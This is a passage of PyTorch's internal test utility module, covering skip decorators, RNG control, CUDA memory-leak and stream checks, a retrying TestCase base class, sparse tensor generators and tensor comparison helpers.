@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is in the caffe2.python.core
"""
if not BUILD_WITH_CAFFE2:
return unittest.skip("Pytorch is compiled without Caffe2")
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
# noarch tests are tests that should be only run on one CI configuration,
# because they don't exercise any interesting platform specific code
# and so if run once, indicate the test should pass everywhere.
# See https://github.com/pytorch/pytorch/issues/53743
def noarchTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_SKIP_NOARCH:
raise unittest.SkipTest("test is noarch: we are skipping noarch tests due to TEST_SKIP_NOARCH")
else:
fn(*args, **kwargs)
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True): # if current True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True): # if current True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
# no_dispatch needed for test_composite_compliance
# Some OpInfos use freeze_rng_state for rng determinism, but
# test_composite_compliance overrides dispatch for all torch functions
# which we need to disable to get and set rng state
with no_dispatch():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
try:
yield
finally:
with no_dispatch():
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
except TypeError as te:
return False
return True
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
# Stores CUDA memory data provided by PyTorch's caching allocator and
# the CUDA driver.
#
# NOTE: The undocumented torch.cuda.mem_get_info() returns
# (#free bytes, #total bytes available) on the GPU
def __enter__(self):
self.caching_allocator_befores = []
self.driver_befores = []
# Performs a gc if required (required if any CUDA memory is held)
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
# NOTE: gc is based exclusively on caching allocator memory
# because the driver will always have some bytes in use (context size?)
if caching_allocator_mem_allocated > 0:
gc.collect()
torch.cuda.empty_cache()
break
# Acquires caching allocator and driver statistics before the test is run
for i in range(num_devices):
self.caching_allocator_befores.append(torch.cuda.memory_allocated(i))
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
self.driver_befores.append(driver_mem_allocated)
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
# Compares caching allocator before/after statistics
# An increase in allocated memory is a discrepancy indicating a possible
# memory leak
discrepancy_detected = False
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
discrepancy_detected = True
break
# Short-circuits if no discrepancy detected
if not discrepancy_detected:
return
# Validates the discrepancy persists after garbage collection and
# is confirmed by the driver API
# NOTE: driver API iscrepancies alone are ignored because with the jiterator
# some tests may permanently increase the CUDA context size and
# that will appear as a driver memory leak but is the expected behavior.
# GCs and clears the cache
gc.collect()
torch.cuda.empty_cache()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
caching_allocator_discrepancy = False
driver_discrepancy = False
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
caching_allocator_discrepancy = True
if driver_mem_allocated > self.driver_befores[i]:
driver_discrepancy = True
if caching_allocator_discrepancy and not driver_discrepancy:
# Just raises a warning if the leak is not validated by the
# driver API
# NOTE: this may be a problem with how the caching allocator collects its
# statistics or a leak too small to trigger the allocation of an
# additional block of memory by the CUDA driver
msg = ("CUDA caching allocator reports a memory leak not "
"verified by the driver API in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
warnings.warn(msg)
elif caching_allocator_discrepancy and driver_discrepancy:
# A caching allocator discrepancy validated by the driver API is a
# failure (except on ROCm, see below)
msg = ("CUDA driver API confirmed a leak in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
# See #62533
# ROCM: Sometimes the transient memory is reported as leaked memory
if TEST_WITH_ROCM:
warnings.warn(msg)
else:
raise RuntimeError(msg)
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
if not IS_SANDCASTLE and disabled_tests_dict is not None:
if test_name in disabled_tests_dict:
issue_url, platforms = disabled_tests_dict[test_name]
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM,
"asan": TEST_WITH_ASAN
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
raise unittest.SkipTest(
f"Test is disabled because an issue exists disabling it: {issue_url}" +
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " +
"If you're seeing this on your local machine and would like to enable this test, " +
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests.")
if TEST_SKIP_FAST:
if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# Acquires the comparison dtype, required since isclose
# requires both inputs have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU or CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
torch.set_warn_always(old_val)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to early terminate test suite if unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# CUDA device side error will cause subsequence test cases to fail.
# stop entire test suite if catches RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError as rte:
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python Exceptions (e.g., unittest.Skip) keeps objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
# Recursive function that incorporates retry logic when PYTORCH_RETRY_TEST_CASES=1 and enables early test
# termination. [DISCLAIMER: ONLY WORKS WITH UNITTEST]
# When report_only is True, flaky tests are only reported, but the signal remains the same (the test will still
# show up red).
# Otherwise, the flaky test will show up green while its stats are captured by test reports.
def _run_with_retry(self, result=None, num_runs_left=0, report_only=True):
if num_runs_left == 0:
return
using_unittest = isinstance(result, unittest.TestResult)
if using_unittest:
failures_before = 0 if result is None else len(result.failures) # num tests marked as failed before starting
errors_before = 0 if result is None else len(result.errors) # num tests marked as errored before starting
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
result.stop()
if not RETRY_TEST_CASES or not using_unittest:
return
err = sys.exc_info()
num_retries_left = num_runs_left - 1
if failures_before < len(result.failures):
print(f" {self._testMethodName} failed - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.failures.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif errors_before < len(result.errors):
print(f" {self._testMethodName} errored - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.errors.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif report_only and num_retries_left < MAX_NUM_RETRIES:
print(f" {self._testMethodName} succeeded - num_retries_left: {num_retries_left}")
result.addUnexpectedSuccess(self)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
def run(self, result=None):
num_runs = MAX_NUM_RETRIES + 1 if RETRY_TEST_CASES else 1
self._run_with_retry(result=result, num_runs_left=num_runs, report_only=not OVERRIDE_FLAKY_SIGNAL)
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
while counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
elements. To achieve this, the sampling method is built-up on
using a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
filled with counts to meet the nnz contraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
# that appers to give exaxt result for all x values
# less than 2**35, at least, the upper limit of x is
# TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
sparse_dim = 2
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
assert len(size) == sparse_dim
def random_sparse_csr(n_rows, n_cols, nnz):
crow_indices = self._make_crow_indices(n_rows, n_cols, nnz, device=device, dtype=index_dtype)
col_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_rows):
count = crow_indices[i + 1] - crow_indices[i]
col_indices[crow_indices[i]:crow_indices[i + 1]], _ = torch.sort(
torch.randperm(n_cols, dtype=index_dtype, device=device)[:count])
low = -1 if dtype != torch.uint8 else 0
high = 1 if dtype != torch.uint8 else 2
values = make_tensor([nnz], device=device, dtype=dtype, low=low, high=high)
return values, crow_indices, col_indices
values, crow_indices, col_indices = random_sparse_csr(size[0], size[1], nnz)
return torch.sparse_csr_tensor(crow_indices,
col_indices,
values, size=size, dtype=dtype, device=device)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
return t.coalesce().to_dense()
# Compares a torch function with a reference function for a given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
n_inp, n_args, n_kwargs = sample_input.numpy()
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
rtol = cast(float, rtol)
atol = cast(float, atol)
assert atol is not None
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
return _compare_scalars_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Construct assert messages basd on internal debug message and user provided message.
def _get_assert_msg(self, msg, debug_msg=None):
if msg is None:
return debug_msg
else:
return f"\n{msg}" if debug_msg is None else f"{debug_msg}\n{msg}"
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def _is_dict(self, obj):
return isinstance(obj, (dict, torch._C.ScriptDict)) # type: ignore[attr-defined]
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
